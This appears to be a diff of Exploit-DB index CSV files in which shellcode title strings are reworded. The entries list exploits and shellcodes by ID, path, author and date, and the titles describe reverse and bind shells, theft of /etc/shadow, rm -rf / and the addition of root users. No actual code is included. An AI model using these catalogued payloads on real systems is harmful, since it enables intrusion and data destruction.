40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
@ -37768,6 +37781,7 @@ id,file,description,date,author,type,platform,port
43496,exploits/hardware/webapps/43496.py,"D-Link Routers 110/412/615/815 < 1.03 - 'service.cgi' Arbitrary Code Execution",2018-01-10,Cr0n1c,webapps,hardware,
43535,exploits/php/webapps/43535.txt,"Xnami 1.0 - Cross-Site Scripting",2018-01-12,"Dennis Veninga",webapps,php,
43543,exploits/php/webapps/43543.txt,"Taxi Booking Script 1.0 - Cross-site Scripting",2018-01-12,Tauco,webapps,php,
43560,exploits/php/webapps/43560.py,"pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection",2018-01-15,absolomb,webapps,php,
41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,



@ -1,33 +1,33 @@
id,file,description,date,author,type,platform
14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
13241,shellcodes/aix/13241.c,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86
13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86
13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86
13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86
@ -35,7 +35,7 @@ id,file,description,date,author,type,platform
13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,shellcode,freebsd_x86
13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13281,shellcodes/generator/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
@ -43,38 +43,38 @@ id,file,description,date,author,type,platform
13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13284,shellcodes/generator/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
13286,shellcodes/generator/13286.c,"Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator
13289,shellcodes/generator/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator
13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
13296,shellcodes/linux_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips
13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc
13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
13307,shellcodes/linux_x86/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
13308,shellcodes/linux_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86
13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86
13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86
13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86
13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86
13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86
13316,shellcodes/linux_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,shellcode,linux_x86
13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86
13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86
13320,shellcodes/linux_x86-64/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64
13321,shellcodes/linux_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,shellcode,linux_x86
13322,shellcodes/linux_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86
@ -94,11 +94,11 @@ id,file,description,date,author,type,platform
13336,shellcodes/linux_x86/13336.c,"Linux/x86 - System Beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",shellcode,linux_x86
13337,shellcodes/linux_x86/13337.c,"Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,shellcode,linux_x86
13338,shellcodes/linux_x86/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,shellcode,linux_x86
13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
13339,shellcodes/linux_x86/13339.asm,"Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,shellcode,linux_x86
13340,shellcodes/linux_x86/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,shellcode,linux_x86
13341,shellcodes/linux_x86/13341.c,"Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,shellcode,linux_x86
13342,shellcodes/linux_x86/13342.c,"Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes)",2008-08-18,LiquidWorm,shellcode,linux_x86
13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
13344,shellcodes/linux_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13345,shellcodes/linux_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
@ -115,21 +115,21 @@ id,file,description,date,author,type,platform
13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
13363,shellcodes/linux_x86/13363.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",shellcode,linux_x86
13364,shellcodes/generator/13364.c,"Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",shellcode,generator
13365,shellcodes/linux_x86/13365.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2)",2006-05-01,hophet,shellcode,linux_x86
13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86
13366,shellcodes/linux_x86/13366.txt,"Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)",2006-04-18,xort,shellcode,linux_x86
13367,shellcodes/linux_x86/13367.c,"Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
13368,shellcodes/linux_x86/13368.c,"Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes)",2006-04-17,izik,shellcode,linux_x86
13369,shellcodes/linux_x86/13369.c,"Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes)",2006-04-17,izik,shellcode,linux_x86
13370,shellcodes/linux_x86/13370.c,"Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,shellcode,linux_x86
13371,shellcodes/linux_x86/13371.c,"Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
13372,shellcodes/linux_x86/13372.c,"Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)",2006-04-16,"Gotfault Security",shellcode,linux_x86
13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
13374,shellcodes/linux_x86/13374.c,"Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
13373,shellcodes/linux_x86/13373.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
13374,shellcodes/linux_x86/13374.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2006-04-06,"Gotfault Security",shellcode,linux_x86
13375,shellcodes/linux_x86/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
13376,shellcodes/linux_x86/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
13377,shellcodes/linux_x86/13377.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes)",2006-04-03,"Gotfault Security",shellcode,linux_x86
@ -142,13 +142,13 @@ id,file,description,date,author,type,platform
13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
13389,shellcodes/linux_x86/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
13390,shellcodes/linux_x86/13390.c,"Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,shellcode,linux_x86
13391,shellcodes/linux_x86/13391.c,"Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)",2006-01-21,izik,shellcode,linux_x86
13392,shellcodes/linux_x86/13392.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes)",2006-01-21,izik,shellcode,linux_x86
13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
13394,shellcodes/linux_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,linux_x86
13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86
13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
@ -182,7 +182,7 @@ id,file,description,date,author,type,platform
13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
